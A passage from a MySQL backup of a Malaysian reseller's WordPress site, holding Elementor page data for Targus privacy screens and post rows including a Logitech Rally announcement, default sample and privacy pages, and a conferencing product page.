Screen\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#0c0c0c\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6314953\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"78877de\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"468758b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Apple Macbook<\\/strong><\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b6689d9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"1e7d8da\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"6e8f169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0049031_magnetic-privacy-screen-for-133-macbook-2017_ebc5f6e1-9646-4840-9ef4-6441c94ae069_grande.jpg?v=1571711592\\\" alt=\\\"Magnetic Privacy Screen for 13.3\\\" width=\\\"274\\\" height=\\\"274\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"61fa17e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7efc979\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Magnetic Privacy Screen for Apple MacBook<\\/strong><\\/h2><ul id=\\\"product-features\\\"><li>Protect your on-screen data, Privacy Screens block angled viewing from prying eyes<\\/li><li>Magnetic screens easy to attach, remove and reattach. No tools, no adhesives, no installation required<\\/li><li>Blue light filter: Targus Privacy Screens reduce blue light for better protection and reading comfort<\\/li><li>Available\\u00a0 for :-<\\/li><\\/ul><ol><li style=\\\"list-style-type: none;\\\"><ol><li><h4>MacBook 12-inch\\u00a0 (ASM12MBGL)<\\/h4><\\/li><li><h4>MacBook 13.3-inch (ASM133MBP6GL)<\\/h4><\\/li><li><h4>MacBook Air 13.3-inch (ASM133MBA7GL)<\\/h4><\\/li><li><h4>MacBook 15.4-inch (ASM154MBGL)<\\/h4><\\/li><li><h4>MacBook Pro 15.4-inch (ASM154MBP6GL)<\\/h4><\\/li><\\/ol><\\/li><\\/ol>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8d9f0b2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"08b3411\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"524d5be\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1e7590b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"975bc53\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"05e81b1\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"83489ee\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ae0925b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ffd343a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Microsoft Surface<\\/strong><\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e15e040\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"9454e78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"95d0520\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0023768_privacy-screen-microsoft-surface-pro-4-123-clear_grande.jpg?v=1571711583\\\" alt=\\\"Privacy Screen Microsoft Surface Pro 4 (12.3\\\" width=\\\"215\\\" height=\\\"215\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7666383\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"da26715\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\">\\u00a0Microsoft Surface Pro 4 (12.3\\\") - Clear<\\/h2><ul id=\\\"product-features\\\"><li>Privacy Screen for the\\u00a0Microsoft Surface Pro 4 (12.3\\\") tablet<\\/li><li>Works with touch screen<\\/li><li>Anti-glare<\\/li><li>Protect the information on your screen from unwanted viewing<\\/li><li>Targus privacy screens are more touch-sensitive than other screens on the market<\\/li><li>Reversible screen: shiny side ensures clarity for viewing inside, matt side reduces glare for viewing outside or in a bright room<strong><a href=\\\"https:\\/\\/uk.targus.com\\/pages\\/keep-your-business-your-business\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\"><u><br \\/><\\/u><\\/a><\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c1cbe15\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"182a368\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bd7176c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"48594a0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8dd9cb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ff73127\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"99d1e23\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"868d42c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f0f8ace\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Laptop<\\/strong><\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"26653f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"7b30821\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"53def41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0019195_privacy-screen-116w-169_grande.jpg?v=1571711590\\\" alt=\\\"Targus Privacy Screen 11.6\\\" width=\\\"307\\\" height=\\\"307\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e8342f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"76157d9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\">Privacy Screen<\\/h2><ul id=\\\"product-features\\\"><li>Privacy Screen for tablet, laptop or desktop screens<\\/li><li>Works with touch screens and dual screens<\\/li><li>Blue light filter: Targus Privacy Screens reduce blue light for better protection and reading comfort<\\/li><li>Anti-glare<\\/li><li>Protect the information on your screen from unwanted viewing<\\/li><li>Targus privacy screens are more touch-sensitive than other screens on the market<\\/li><li>Reversible screen: shiny side ensures clarity for viewing inside, matt side reduces glare for viewing outside or in a bright room<\\/li><li>Three easy attachment options: under-bezel tabs, tab guides or re-usable adhesive strips<\\/li><li>Available for :-\\u00a0<\\/li><\\/ul><ol><li style=\\\"list-style-type: none;\\\"><ol><li><h4>Screen 11.6\\\"W 16:9 - (ASF116W9EU)<\\/h4><\\/li><li><h4>Screen 12.1\\\"W 16:10 - (ASF121WEU)<\\/h4><\\/li><li><h4>Screen 12.5\\\"W 16:9 - (ASF125W9EU)<\\/h4><\\/li><li><h4>Screen 13.3\\\"W 16:10 - (ASF133WEU)<\\/h4><\\/li><li><h4>Screen 13.3\\\"W 16:9 - (ASF133W9EU)<\\/h4><\\/li><li><h4>Screen 14.1\\\"W 16:10 - (ASF141WEU)<\\/h4><\\/li><li><h4>Screen 14.1\\\"W 16:9 - (ASF141W9EU)<\\/h4><\\/li><li><h4>Screen 14\\u201d W 16:9 - (ASF14W9EU)<\\/h4><\\/li><li><h4>Screen 15.4\\\"W 16:10 - (ASF154WEU)<\\/h4><\\/li><li><h4>Screen 15.6\\\"W 16:9 - (ASF156W9EU)<\\/h4><\\/li><\\/ol><\\/li><\\/ol>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e074c0b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b967aae\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d7859f1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bf78a0b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e0e7dda\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"dcf0830\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9b6734e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1a21cff\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6ccba5d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Monitor<\\/strong><\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8be1a67\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"a283150\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"485c58c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0019283_privacy-screen-17-43_grande.jpg?v=1571711590\\\" alt=\\\"Targus Privacy Screen 17\\\" width=\\\"269\\\" height=\\\"269\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"70e84b3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"05a0a67\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\">Privacy Screen<\\/h2><ul id=\\\"product-features\\\"><li>Privacy Screen for laptop or desktop screens<\\/li><li>Works with touch screens and dual screens<\\/li><li>Blue light filter: Targus Privacy Screens reduce blue light for better protection and reading comfort<\\/li><li>Anti-glare<\\/li><li>Protect the information on your screen from unwanted viewing<\\/li><li>Targus privacy screens are more touch-sensitive than other screens on the market<\\/li><li>Reversible screen: shiny side ensures clarity for viewing inside, matt side reduces glare for viewing outside or in a bright room<\\/li><li>Three easy attachment options: under-bezel tabs, tab guides or re-usable adhesive strips<\\/li><li>Available for :-\\u00a0<\\/li><\\/ul><ol><li style=\\\"list-style-type: none;\\\"><ol><li><h4>Screen 17\\\"W 4:3 - (ASF170EU)<\\/h4><\\/li><li><h4>Screen 19\\\"W 4:3 - (ASF190EU)<\\/h4><\\/li><li><h4>Screen 19\\\"W 16:10 - (ASF19WEU)<\\/h4><\\/li><li><h4>Screen 21.5\\\"W 16:9 - (ASF215W9EU)<\\/h4><\\/li><li><h4>Screen 22\\\"W 16:10 - (ASF220WEU)<\\/h4><\\/li><li><h4>Screen 22\\\"W 16:9 - (ASF22W9EU)<\\/h4><\\/li><li><h4>Screen 23\\\"W 16:9 - (ASF23W9EU)<\\/h4><\\/li><li><h4>Screen 23.8\\\"W 16:9 - (ASF238W9EU)<\\/h4><\\/li><li><h4>Screen 24\\\"W 16:10 - (ASF24WEU)<\\/h4><\\/li><li><h4>Screen 24\\\"W 16:9 - (ASF24W9EU)<\\/h4><\\/li><li><h4>Screen 27\\\"W 16:9 - (ASF27W9EU)<\\/h4><\\/li><\\/ol><\\/li><\\/ol>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a1a9a8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"058d29d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d3d9795\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(8944,3704,'_wp_page_template','template-fullwidth.php'),(8945,3704,'_elementor_edit_mode','builder'),(8951,3686,'_elementor_css','a:5:{s:4:\"time\";i:1573020884;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}');
/*!40000 ALTER TABLE `wpdp_postmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_posts`
--

DROP TABLE IF EXISTS `wpdp_posts`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_posts` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_author` bigint(20) unsigned NOT NULL DEFAULT '0',
  `post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_title` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_excerpt` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_status` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'publish',
  `comment_status` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'open',
  `ping_status` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'open',
  `post_password` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `post_name` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `to_ping` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `pinged` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content_filtered` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_parent` bigint(20) unsigned NOT NULL DEFAULT '0',
  `guid` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `menu_order` int(11) NOT NULL DEFAULT '0',
  `post_type` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'post',
  `post_mime_type` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_count` bigint(20) NOT NULL DEFAULT '0',
  PRIMARY KEY (`ID`),
  KEY `post_name` (`post_name`(191)),
  KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`),
  KEY `post_parent` (`post_parent`),
  KEY `post_author` (`post_author`)
) ENGINE=MyISAM AUTO_INCREMENT=3705 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_posts`
--

LOCK TABLES `wpdp_posts` WRITE;
/*!40000 ALTER TABLE `wpdp_posts` DISABLE KEYS */;
INSERT INTO `wpdp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES (1,1,'2018-12-11 00:50:30','2018-12-11 00:50:30','<!-- wp:paragraph -->\r\n<p align=\"justify\">Logitech has announced Logitech Rally, a modular conference cam that features Ultra-HD 4K video, modular audio components, PTZ capabilities and Logitech RightSense technology.</p>\r\n<p align=\"justify\">â€œJust a few years ago, a high quality video and audio system like Logitech Rally would have easily been a five-figure investment,â€ said Scott Wharton, vice president and general manager of the Logitech Video Collaboration.</p>\r\n<p align=\"justify\">â€œNow, with the Rally portfolio of products, customers get a premium, modular system that raises the bar for USB-connected AV solutions - all at a fraction of the price of other high-end systems.â€</p>\r\n<p align=\"justify\">Rally separated the speakers from the microphones. By mounting speakers near the display, the audio is better aligned with video, and voices of far-end participants come from the front of the room, which is what people intuitively expect, according to Logitech.</p>\r\n<p align=\"justify\">\"Logitech has enjoyed great success with its affordable USB conferencecams which work well in traditional meeting rooms and huddle spaces,â€ said Ira M. Weinstein, managing partner, Recon Research.\"</p>\r\n<p align=\"justify\">\"But until now, Logitech lacked a premium offering for larger spaces. The Rally portfolio gives Logitech the opportunity to move up-market and extend the reach of its conferencecam lineup. Based on what Iâ€™ve seen, Rally has the potential to be as disruptive as the earlier Logitech conferencecam solutionsâ€</p>\r\n<p align=\"justify\">The standalone Logitech Rally Camera is available for $1999.95. The Logitech Rally system, which includes Rally Camera, plus table and display hubs, one speaker and one mic pod, is available for $3599.95.</p>\r\n<!-- /wp:paragraph -->','Logitech announces Logitech Rally','','publish','closed','closed','','logitech-rally','','','2019-10-01 14:48:18','2019-10-01 06:48:18','',0,'https://bintara.com.my/?p=1',0,'post','',0),(2,1,'2018-12-11 00:50:30','2018-12-11 00:50:30','<!-- wp:paragraph -->\n<p>This is an example page. It\'s different from a blog post because it will stay in one place and will show up in your site navigation (in most themes). Most people start with an About page that introduces them to potential site visitors. It might say something like this:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:quote -->\n<blockquote class=\"wp-block-quote\"><p>Hi there! I\'m a bike messenger by day, aspiring actor by night, and this is my website. I live in Los Angeles, have a great dog named Jack, and I like pi&#241;a coladas. (And gettin\' caught in the rain.)</p></blockquote>\n<!-- /wp:quote -->\n\n<!-- wp:paragraph -->\n<p>...or something like this:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:quote -->\n<blockquote class=\"wp-block-quote\"><p>The XYZ Doohickey Company was founded in 1971, and has been providing quality doohickeys to the public ever since. Located in Gotham City, XYZ employs over 2,000 people and does all kinds of awesome things for the Gotham community.</p></blockquote>\n<!-- /wp:quote -->\n\n<!-- wp:paragraph -->\n<p>As a new WordPress user, you should go to <a href=\"https://bintara.com.my/wp-admin/\">your dashboard</a> to delete this page and create new pages for your content. Have fun!</p>\n<!-- /wp:paragraph -->','Sample Page','','publish','closed','open','','sample-page','','','2018-12-11 00:50:30','2018-12-11 00:50:30','',0,'https://bintara.com.my/?page_id=2',0,'page','',0),(3,1,'2018-12-11 00:50:30','2018-12-11 00:50:30','<!-- wp:heading --><h2>Who we are</h2><!-- /wp:heading --><!-- wp:paragraph --><p>Our website address is: https://bintara.com.my.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>What personal data we collect and why we collect it</h2><!-- /wp:heading --><!-- wp:heading {\"level\":3} --><h3>Comments</h3><!-- /wp:heading --><!-- wp:paragraph --><p>When visitors leave comments on the site we collect the data shown in the comments form, and also the visitor&#8217;s IP address and browser user agent string to help spam detection.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>An anonymized string created from your email address (also called a hash) may be provided to the Gravatar service to see if you are using it. The Gravatar service privacy policy is available here: https://automattic.com/privacy/. After approval of your comment, your profile picture is visible to the public in the context of your comment.</p><!-- /wp:paragraph --><!-- wp:heading {\"level\":3} --><h3>Media</h3><!-- /wp:heading --><!-- wp:paragraph --><p>If you upload images to the website, you should avoid uploading images with embedded location data (EXIF GPS) included. Visitors to the website can download and extract any location data from images on the website.</p><!-- /wp:paragraph --><!-- wp:heading {\"level\":3} --><h3>Contact forms</h3><!-- /wp:heading --><!-- wp:heading {\"level\":3} --><h3>Cookies</h3><!-- /wp:heading --><!-- wp:paragraph --><p>If you leave a comment on our site you may opt-in to saving your name, email address and website in cookies. These are for your convenience so that you do not have to fill in your details again when you leave another comment. These cookies will last for one year.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>If you have an account and you log in to this site, we will set a temporary cookie to determine if your browser accepts cookies. This cookie contains no personal data and is discarded when you close your browser.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>When you log in, we will also set up several cookies to save your login information and your screen display choices. Login cookies last for two days, and screen options cookies last for a year. If you select &quot;Remember Me&quot;, your login will persist for two weeks. If you log out of your account, the login cookies will be removed.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>If you edit or publish an article, an additional cookie will be saved in your browser. This cookie includes no personal data and simply indicates the post ID of the article you just edited. It expires after 1 day.</p><!-- /wp:paragraph --><!-- wp:heading {\"level\":3} --><h3>Embedded content from other websites</h3><!-- /wp:heading --><!-- wp:paragraph --><p>Articles on this site may include embedded content (e.g. videos, images, articles, etc.). Embedded content from other websites behaves in the exact same way as if the visitor has visited the other website.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>These websites may collect data about you, use cookies, embed additional third-party tracking, and monitor your interaction with that embedded content, including tracking your interaction with the embedded content if you have an account and are logged in to that website.</p><!-- /wp:paragraph --><!-- wp:heading {\"level\":3} --><h3>Analytics</h3><!-- /wp:heading --><!-- wp:heading --><h2>Who we share your data with</h2><!-- /wp:heading --><!-- wp:heading --><h2>How long we retain your data</h2><!-- /wp:heading --><!-- wp:paragraph --><p>If you leave a comment, the comment and its metadata are retained indefinitely. This is so we can recognize and approve any follow-up comments automatically instead of holding them in a moderation queue.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>For users that register on our website (if any), we also store the personal information they provide in their user profile. All users can see, edit, or delete their personal information at any time (except they cannot change their username). Website administrators can also see and edit that information.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>What rights you have over your data</h2><!-- /wp:heading --><!-- wp:paragraph --><p>If you have an account on this site, or have left comments, you can request to receive an exported file of the personal data we hold about you, including any data you have provided to us. You can also request that we erase any personal data we hold about you. This does not include any data we are obliged to keep for administrative, legal, or security purposes.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>Where we send your data</h2><!-- /wp:heading --><!-- wp:paragraph --><p>Visitor comments may be checked through an automated spam detection service.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>Your contact information</h2><!-- /wp:heading --><!-- wp:heading --><h2>Additional information</h2><!-- /wp:heading --><!-- wp:heading {\"level\":3} --><h3>How we protect your data</h3><!-- /wp:heading --><!-- wp:heading {\"level\":3} --><h3>What data breach procedures we have in place</h3><!-- /wp:heading --><!-- wp:heading {\"level\":3} --><h3>What third parties we receive data from</h3><!-- /wp:heading --><!-- wp:heading {\"level\":3} --><h3>What automated decision making and/or profiling we do with user data</h3><!-- /wp:heading --><!-- wp:heading {\"level\":3} --><h3>Industry regulatory disclosure requirements</h3><!-- /wp:heading -->','Privacy Policy','','draft','closed','open','','privacy-policy','','','2018-12-11 00:50:30','2018-12-11 00:50:30','',0,'https://bintara.com.my/?page_id=3',0,'page','',0),(6,1,'2018-12-11 01:04:24','2018-12-11 01:04:24','','Home','','publish','closed','closed','','home','','','2019-09-30 16:40:34','2019-09-30 08:40:34','',0,'https://bintara.com.my/?page_id=6',0,'page','',0),(8,1,'2018-12-11 01:04:24','2018-12-11 01:04:24','','Home','','inherit','closed','closed','','6-revision-v1','','','2018-12-11 01:04:24','2018-12-11 01:04:24','',6,'https://bintara.com.my/blog/2018/12/11/6-revision-v1/',0,'revision','',0),(1733,1,'2018-12-12 08:16:48','2018-12-12 00:16:48','','Home','','inherit','closed','closed','','6-revision-v1','','','2018-12-12 08:16:48','2018-12-12 00:16:48','',6,'https://bintara.com.my/blog/2018/12/12/6-revision-v1/',0,'revision','',0),(10,1,'2018-12-11 01:11:58','2018-12-11 01:11:58','','Frontpage','','inherit','closed','closed','','6-revision-v1','','','2018-12-11 01:11:58','2018-12-11 01:11:58','',6,'https://bintara.com.my/blog/2018/12/11/6-revision-v1/',0,'revision','',0),(1297,1,'2018-12-11 11:13:04','2018-12-11 03:13:04','','ABOUT','','publish','closed','closed','','about','','','2019-09-24 08:57:12','2019-09-24 00:57:12','',0,'https://bintara.com.my/?p=1297',1,'nav_menu_item','',0),(13,1,'2018-12-11 01:17:57','2018-12-11 01:17:57','<p>This is the WPForms preview page. All your form previews will be handled on this page.</p><p>The page is set to private, so it is not publicly accessible. Please do not delete this page :) .</p>','WPForms Preview','','private','closed','closed','','wpforms-preview','','','2018-12-11 01:17:57','2018-12-11 01:17:57','',0,'https://bintara.com.my/wpforms-preview/',0,'page','',0),(14,1,'2018-12-11 01:23:09','2018-12-11 01:23:09','','onepress-plus-dummy-data','','inherit','open','closed','','onepress-plus-dummy-data','','','2018-12-11 01:23:09','2018-12-11 01:23:09','',0,'https://bintara.com.my/wp-content/uploads/2018/12/onepress-plus-dummy-data.xml',0,'attachment','',0),(15,1,'2018-12-11 01:23:09','2018-12-11 01:23:09','','onepress-plus-config','','inherit','open','closed','','onepress-plus-config','','','2018-12-11 01:23:09','2018-12-11 01:23:09','',0,'https://bintara.com.my/wp-content/uploads/2018/12/onepress-plus-config.json',0,'attachment','',0),(16,1,'2018-12-11 01:30:23','2018-12-11 01:30:23','<h2>VIDEO CONFERENCINGâ€‹</h2>		\n										<img width=\"300\" height=\"262\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png 687w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h2>CONFERENCE CAMERAS</h2><p>Bring video collaboration to huddle rooms and large conference rooms with Logitech ConferenceCams.</p>		\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png 687w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h3>GROUP</h3><p>Video conferencing for mid to large-sized meeting rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-group/\" role=\"button\">\n						View\n					</a>\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp.png 687w, https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h4>Rally</h4><p>Premium Ultra-HD ConferenceCam system with automatic camera control</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-rally/\" role=\"button\">\n						View\n					</a>\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam.png 393w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h4>MeetUp</h4><p>All-in-One ConferenceCam with 120Â° field of view and integrated audio, perfect for small conference and huddle rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-meetup/\" role=\"button\">\n						View\n					</a>\n										<img width=\"393\" height=\"393\" 